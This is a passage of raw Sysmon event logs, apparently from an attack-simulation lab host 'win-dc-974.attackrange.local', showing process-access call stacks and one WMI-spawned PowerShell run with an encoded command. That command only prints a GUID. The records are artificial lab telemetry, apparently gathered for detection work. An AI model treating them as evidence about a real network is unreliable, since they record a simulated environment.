16:53:45.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.092{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-A8AA-00000000AD01}13600C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.092{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 11241100x80000000000000002239327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.092{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_dk1auwco.b1h.ps12021-03-02 16:53:45.092 10341000x80000000000000002239326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.092{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.092{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.092{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.075{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.075{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002239320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.091{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedComm VwByAGkAdABlAC0ASABvAHMAdAAgADkAYwA1ADUAZgA4ADAAYgAtADYAOQA5AGUALQA0ADkAYwA5AC0AOQBmADgAMAAtADgAMgBmAGEAMQAzAGIANQA0ADAAYwBiAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002239319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.075{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.067{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A6AA-00000000AD01}15836C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.066{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.065{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A4AA-00000000AD01}13336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.065{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.064{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A2AA-00000000AD01}6424C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.064{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.062{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.060{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.060{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 